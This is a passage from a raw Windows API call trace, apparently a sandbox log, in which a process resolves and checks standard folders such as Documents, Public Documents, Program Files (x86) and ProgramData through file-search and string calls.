lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x108f2c0 [0164.216] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf9061f60, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf9061f60, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0164.216] GetLastError () returned 0x12 [0164.216] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.217] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fadc*="c:\\Windows") returned 1 [0164.217] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows", psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fe38*="c:\\Windows\\") returned 1 [0164.218] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x28fad8*="c:\\Windows\\") returned 1 [0164.218] SysReAllocStringLen (in: pbstr=0x28fe38*="c:\\Windows\\", psz="c:\\Windows", len=0xa | out: pbstr=0x28fe38*="c:\\Windows") returned 1 [0164.218] SysReAllocStringLen (in: pbstr=0x28fe3c*=0x0, psz="c:\\Windows", len=0xa | out: pbstr=0x28fe3c*="c:\\Windows") returned 1 [0164.219] SysReAllocStringLen (in: pbstr=0x2b10054*=0x0, psz="c:\\Windows\\", len=0xb | out: pbstr=0x2b10054*="c:\\Windows\\") returned 1 [0164.219] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0164.219] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents", cchLength=0x1c | out: lpsz="c:\\users\\keecfmwgj\\documents") returned 0x1c [0164.219] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\keecfmwgj\\documents", len=0x1c | out: pbstr=0x2b1009c*="c:\\users\\keecfmwgj\\documents") returned 1 [0164.220] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.220] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.221] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="keecfmwgj", len=0x9 | out: pbstr=0x2b100d4*="keecfmwgj") returned 1 [0164.221] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="documents", len=0x9 | out: pbstr=0x2b100e0*="documents") returned 1 [0164.244] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.244] SysReAllocStringLen (in: pbstr=0x28fe2c*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe2c*="c:\\") returned 1 [0164.244] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.245] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.245] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.246] GetLastError () returned 0x12 [0164.246] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.246] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.246] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe2c*="c:\\Users\\") returned 1 [0164.246] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="keecfmwgj", len=0x9 | out: pbstr=0x28fae8*="keecfmwgj") returned 1 [0164.247] FindFirstFileW (in: lpFileName="c:\\Users\\keecfmwgj" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x108f2c0 [0164.247] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0 [0164.247] GetLastError () returned 0x12 [0164.247] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.248] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj") returned 1 [0164.248] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj", psz="c:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\") returned 1 [0164.248] SysReAllocStringLen (in: pbstr=0x28fae8*="keecfmwgj", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0164.248] FindFirstFileW (in: lpFileName="c:\\Users\\kEecfMwgj\\documents" (normalized: "c:\\users\\keecfmwgj\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x108f2c0 [0164.248] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794cf490, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xc7a8ee20, ftLastAccessTime.dwHighDateTime=0x1da4ad7, ftLastWriteTime.dwLowDateTime=0xc7a8ee20, ftLastWriteTime.dwHighDateTime=0x1da4ad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0164.248] GetLastError () returned 0x12 [0164.249] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.249] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fadc*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0164.249] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents", psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0164.250] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fad8*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0164.250] SysReAllocStringLen (in: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe2c*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0164.251] SysReAllocStringLen (in: pbstr=0x28fe30*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fe30*="c:\\Users\\kEecfMwgj\\Documents") returned 1 [0164.251] SysReAllocStringLen (in: pbstr=0x2b10050*=0x0, psz="c:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x2b10050*="c:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0164.251] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0164.252] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents", cchLength=0x19 | out: lpsz="c:\\users\\public\\documents") returned 0x19 [0164.252] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\users\\public\\documents", len=0x19 | out: pbstr=0x2b1009c*="c:\\users\\public\\documents") returned 1 [0164.256] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.257] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="users", len=0x5 | out: pbstr=0x2ad0834*="users") returned 1 [0164.257] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="public", len=0x6 | out: pbstr=0x2b100d4*="public") returned 1 [0164.257] SysReAllocStringLen (in: pbstr=0x2b100e0*=0x0, psz="documents", len=0x9 | out: pbstr=0x2b100e0*="documents") returned 1 [0164.258] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.258] SysReAllocStringLen (in: pbstr=0x28fe20*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe20*="c:\\") returned 1 [0164.258] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="users", len=0x5 | out: pbstr=0x28fae8*="users") returned 1 [0164.258] FindFirstFileW (in: lpFileName="c:\\users" (normalized: "c:\\users"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x108f2c0 [0164.259] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0 [0164.259] GetLastError () returned 0x12 [0164.259] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.259] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Users", len=0x8 | out: pbstr=0x28fadc*="c:\\Users") returned 1 [0164.259] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users", psz="c:\\Users\\", len=0x9 | out: pbstr=0x28fe20*="c:\\Users\\") returned 1 [0164.259] SysReAllocStringLen (in: pbstr=0x28fae8*="users", psz="public", len=0x6 | out: pbstr=0x28fae8*="public") returned 1 [0164.259] FindFirstFileW (in: lpFileName="c:\\Users\\public" (normalized: "c:\\users\\public"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0x108f2c0 [0164.260] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0164.260] GetLastError () returned 0x12 [0164.260] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.260] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\", psz="c:\\Users\\Public", len=0xf | out: pbstr=0x28fadc*="c:\\Users\\Public") returned 1 [0164.260] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public", psz="c:\\Users\\Public\\", len=0x10 | out: pbstr=0x28fe20*="c:\\Users\\Public\\") returned 1 [0164.260] SysReAllocStringLen (in: pbstr=0x28fae8*="public", psz="documents", len=0x9 | out: pbstr=0x28fae8*="documents") returned 1 [0164.261] FindFirstFileW (in: lpFileName="c:\\Users\\Public\\documents" (normalized: "c:\\users\\public\\documents"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0x108f2c0 [0164.261] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdae6622, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 0 [0164.261] GetLastError () returned 0x12 [0164.261] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.262] SysReAllocStringLen (in: pbstr=0x28fadc*="c:\\Users\\Public\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fadc*="c:\\Users\\Public\\Documents") returned 1 [0164.262] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents", psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\") returned 1 [0164.263] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fad8*="c:\\Users\\Public\\Documents\\") returned 1 [0164.263] SysReAllocStringLen (in: pbstr=0x28fe20*="c:\\Users\\Public\\Documents\\", psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe20*="c:\\Users\\Public\\Documents") returned 1 [0164.263] SysReAllocStringLen (in: pbstr=0x28fe24*=0x0, psz="c:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fe24*="c:\\Users\\Public\\Documents") returned 1 [0164.264] SysReAllocStringLen (in: pbstr=0x2b10068*=0x0, psz="c:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x2b10068*="c:\\Users\\Public\\Documents\\") returned 1 [0164.264] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0164.265] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)", cchLength=0x16 | out: lpsz="c:\\program files (x86)") returned 0x16 [0164.265] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\program files (x86)", len=0x16 | out: pbstr=0x2b1009c*="c:\\program files (x86)") returned 1 [0164.265] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.265] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x2ad0834*="program files (x86)") returned 1 [0164.266] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.266] SysReAllocStringLen (in: pbstr=0x28fe14*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe14*="c:\\") returned 1 [0164.266] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0164.266] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x108f2c0 [0164.267] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0164.267] GetLastError () returned 0x12 [0164.267] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.267] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0164.267] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fe14*="c:\\Program Files (x86)\\") returned 1 [0164.271] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fad8*="c:\\Program Files (x86)\\") returned 1 [0164.271] SysReAllocStringLen (in: pbstr=0x28fe14*="c:\\Program Files (x86)\\", psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe14*="c:\\Program Files (x86)") returned 1 [0164.272] SysReAllocStringLen (in: pbstr=0x28fe18*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fe18*="c:\\Program Files (x86)") returned 1 [0164.272] SysReAllocStringLen (in: pbstr=0x2b1006c*=0x0, psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x2b1006c*="c:\\Program Files (x86)\\") returned 1 [0164.272] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\ProgramData") returned 0x0 [0164.273] CharLowerBuffW (in: lpsz="C:\\ProgramData", cchLength=0xe | out: lpsz="c:\\programdata") returned 0xe [0164.273] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\programdata", len=0xe | out: pbstr=0x2b1009c*="c:\\programdata") returned 1 [0164.273] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.274] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="programdata", len=0xb | out: pbstr=0x2ad0834*="programdata") returned 1 [0164.274] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.274] SysReAllocStringLen (in: pbstr=0x28fe08*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fe08*="c:\\") returned 1 [0164.274] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="programdata", len=0xb | out: pbstr=0x28fae8*="programdata") returned 1 [0164.274] FindFirstFileW (in: lpFileName="c:\\programdata" (normalized: "c:\\programdata"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0x108f2c0 [0164.275] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x41b67910, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x41b67910, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 0 [0164.275] GetLastError () returned 0x12 [0164.275] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.275] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fadc*="c:\\ProgramData") returned 1 [0164.275] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData", psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fe08*="c:\\ProgramData\\") returned 1 [0164.276] SysReAllocStringLen (in: pbstr=0x28fad8*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x28fad8*="c:\\ProgramData\\") returned 1 [0164.276] SysReAllocStringLen (in: pbstr=0x28fe08*="c:\\ProgramData\\", psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe08*="c:\\ProgramData") returned 1 [0164.276] SysReAllocStringLen (in: pbstr=0x28fe0c*=0x0, psz="c:\\ProgramData", len=0xe | out: pbstr=0x28fe0c*="c:\\ProgramData") returned 1 [0164.277] SysReAllocStringLen (in: pbstr=0x2b10070*=0x0, psz="c:\\ProgramData\\", len=0xf | out: pbstr=0x2b10070*="c:\\ProgramData\\") returned 1 [0164.277] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x2b13b58 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0164.277] SysReAllocStringLen (in: pbstr=0x2b1009c*=0x0, psz="c:\\program files (x86)\\common files", len=0x23 | out: pbstr=0x2b1009c*="c:\\program files (x86)\\common files") returned 1 [0164.277] SysReAllocStringLen (in: pbstr=0x2b100a0*=0x0, psz="c:", len=0x2 | out: pbstr=0x2b100a0*="c:") returned 1 [0164.277] SysReAllocStringLen (in: pbstr=0x2ad0834*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x2ad0834*="program files (x86)") returned 1 [0164.277] SysReAllocStringLen (in: pbstr=0x2b100d4*=0x0, psz="common files", len=0xc | out: pbstr=0x2b100d4*="common files") returned 1 [0164.278] SysReAllocStringLen (in: pbstr=0x28faf0*=0x0, psz="c:", len=0x2 | out: pbstr=0x28faf0*="c:") returned 1 [0164.278] SysReAllocStringLen (in: pbstr=0x28fdfc*=0x0, psz="c:\\", len=0x3 | out: pbstr=0x28fdfc*="c:\\") returned 1 [0164.278] SysReAllocStringLen (in: pbstr=0x28fae8*=0x0, psz="program files (x86)", len=0x13 | out: pbstr=0x28fae8*="program files (x86)") returned 1 [0164.278] FindFirstFileW (in: lpFileName="c:\\program files (x86)" (normalized: "c:\\program files (x86)"), lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0x108f2c0 [0164.278] FindNextFileW (in: hFindFile=0x108f2c0, lpFindFileData=0x28fb14 | out: lpFindFileData=0x28fb14*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x39960750, ftLastAccessTime.dwHighDateTime=0x1d99d01, ftLastWriteTime.dwLowDateTime=0x39960750, ftLastWriteTime.dwHighDateTime=0x1d99d01, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 0 [0164.278] GetLastError () returned 0x12 [0164.278] FindClose (in: hFindFile=0x108f2c0 | out: hFindFile=0x108f2c0) returned 1 [0164.279] SysReAllocStringLen (in: pbstr=0x28fadc*=0x0, psz="c:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fadc*="c:\\Program Files (x86)") returned 1 [0164.279] SysReAllocStringLen (in: pbstr=0x28fdfc*="c:\\Program Files (x86)", psz="c:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fdfc*="c:\\Program Files (x86)\\") returned 1 [0164.279] SysReAllocStringLen (in: pbstr=0x28fae8*="program files (x86)", psz="common files", len=0xc | out: 